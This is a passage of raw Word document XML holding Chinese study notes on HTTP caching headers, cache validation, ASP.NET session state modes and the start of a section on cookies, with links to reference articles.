          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Last-modified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: 表明请求的资源上次的修改时间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>If-Modified-Since</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：客户端保留的资源上次的修改时间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Etag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：资源的内容标识。（不唯一，通常为文件的md5或者一段hash值，只要保证写入和验证时的方法一致即可）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所以缓存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>步骤是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1） 查看是否有cache-control 的max-age / s-maxage , 如果有，则用服务器时间date值 + max-age/s-maxage 的秒数计算出新的过期时间，将当前时间与过期时间进行比较，判断是否过期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果没有，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>则用expires 作为过期时间比较</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3）如果过期了，则请求服务器，服务器接收到请求之后，通过Last-Modified和Etag判断文件是否修改过，如果没有修改过则发送一个304到客户端，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>告诉浏览器直接从自己本地的缓存取数据；如果修改过那就整个数据重新发给浏览器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>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24" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269230" cy="3714750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/slly/p/6732749.html" \l "undefined" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/slly/p/6732749.html#undefined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/shixiaomiao1122/p/7591556.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/shixiaomiao1122/p/7591556.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://segmentfault.com/a/1190000011212929" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://segmentfault.com/a/1190000011212929</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体实现：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>&lt;meta http-equiv="Expires" content="0"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Monaco" w:hAnsi="Monaco" w:eastAsia="Monaco" w:cs="Monaco"/>
          <w:color w:val="4F4F4F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&lt;meta http-equiv="Cache-Control" content="no-cache"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Session会话</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">1、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InProc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session Provider是最快的，因为所有数据都存在应用程序的内存里，Session数据在IIS重启，或者站点被回收的情况下丢失，你可以在用户量较小的网站上使用这种模式，但别在Web Farm下使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">2、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>State Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>模式：Session数据被存储于aspnet_state.exe应用中，他在Web服务之外保存Session数据，所以Web服务出现问题不会对他的Session数据造成影响，在将Session数据存储到StateServer之前需要序列化对象，在Web Farm中我们能安全地使用这个模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">3、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>模式：他将Session数据保存到SQL Server中，我们需要提供连接串，我们存储时也需要对对象进行序列化，这种模式在实际Web Farm的生产环境中是非常有用的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">4、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Custom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>模式，当我们需要使用一个已经存在的表来存储Session数据时，在自定义模式中，我们也能创建自定义的Session ID，但是不推荐你自己来实现Provider，推荐使用第三方的Provider。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/ideacore/p/6423281.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/ideacore/p/6423281.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.cnblogs.com/luminji/archive/2011/11/03/2195704.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ASP.NET性能优化之分布式Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cookie机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cookie的作用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如你登录录邮箱，登录一个页面。我们经常会在此时设置30天内记住我，或者自动登录选项</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cookie的分类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cookie分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会话cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>持久cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
